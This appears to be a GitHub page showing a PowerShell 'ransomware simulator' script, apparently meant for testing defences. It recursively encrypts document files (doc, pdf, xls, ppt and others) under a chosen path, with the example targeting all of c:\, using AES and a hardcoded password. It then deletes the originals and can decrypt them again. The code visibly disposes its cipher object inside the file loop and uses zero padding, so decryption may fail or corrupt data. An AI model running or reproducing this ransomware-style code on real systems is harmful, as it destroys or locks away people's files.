-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathInvoke-RansomSIM.ps1
104 lines (88 loc) · 4 KB
/
Invoke-RansomSIM.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
<#
.SYNOPSIS
Rasnomware simulator that encrypts or decrypts Folder of files with specific popular document extensions use an embedded password (the password is embedded to avoid abuse of the script)
The script is based mostly on the implementation of Invoke-AESEncryption.ps1 from https://www.powershellgallery.com/packages/DRTools/4.0.2.3/Content/Functions%5CInvoke-AESEncryption.ps1
.DESCRIPTION
Takes a Folder and encrypts or decrypts it with AES256 (CBC)
.PARAMETER Mode
Encryption or Decryption Mode
.PARAMETER Path
Filepath for folder to encrypt or decrypt
.EXAMPLE
Invoke-RansomSIM -Mode Encrypt -Path c:\
Description
-----------
Encrypts all document files on disk c:\ the file
#>
function Invoke-RansomSIM {
[CmdletBinding()]
[OutputType([string])]
Param
(
[Parameter(Mandatory = $true)]
[ValidateSet('Encrypt', 'Decrypt')]
[String]$Mode,
[Parameter(Mandatory = $true)]
[Parameter(Mandatory = $true, ParameterSetName = "CryptFile")]
[String]$Path
)
Begin {
$shaManaged = New-Object System.Security.Cryptography.SHA256Managed
$aesManaged = New-Object System.Security.Cryptography.AesManaged
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
$Key = "mortest"
$ExtRegex = '\.(doc|pdf|docx|xls|xlsx|pptx|ppt)$'
}
Process {
$aesManaged.Key = $shaManaged.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Key))
switch ($Mode) {
'Encrypt' {
Foreach($filepath in @(gci $Path -Recurse -Attributes !Directory | Where-Object{$_.Extension -match $ExtRegex} | %{$_.FullName}))
{
$File = Get-Item -Path $filepath -ErrorAction SilentlyContinue
if (!$File.FullName) {
Write-Error -Message "File not found!"
break
}
$plainBytes = [System.IO.File]::ReadAllBytes($File.FullName)
$outPath = $File.FullName + ".cryptest"
$encryptor = $aesManaged.CreateEncryptor()
$encryptedBytes = $encryptor.TransformFinalBlock($plainBytes, 0, $plainBytes.Length)
$encryptedBytes = $aesManaged.IV + $encryptedBytes
$aesManaged.Dispose()
[System.IO.File]::WriteAllBytes($outPath, $encryptedBytes)
(Get-Item $outPath).LastWriteTime = $File.LastWriteTime
Remove-Item $filepath
Write-Host "File encrypted to $outPath"
}
}
'Decrypt' {
Foreach($filepath in @(gci $Path -Recurse -Attributes !Directory | Where-Object{$_.Extension -match '\.(cryptest)$'} | %{$_.FullName}))
{
$File = Get-Item -Path $filepath -ErrorAction SilentlyContinue
if (!$File.FullName) {
Write-Error -Message "File not found!"
break
}
$cipherBytes = [System.IO.File]::ReadAllBytes($File.FullName)
$outPath = $File.FullName -replace ".cryptest"
$aesManaged.IV = $cipherBytes[0..15]
$decryptor = $aesManaged.CreateDecryptor()
$decryptedBytes = $decryptor.TransformFinalBlock($cipherBytes, 16, $cipherBytes.Length - 16)
$aesManaged.Dispose()
[System.IO.File]::WriteAllBytes($outPath, $decryptedBytes)
(Get-Item $outPath).LastWriteTime = $File.LastWriteTime
Remove-Item $filepath
Write-Host "File decrypted to $outPath"
}
}
}
}
End {
$shaManaged.Dispose()
$aesManaged.Dispose()
}
}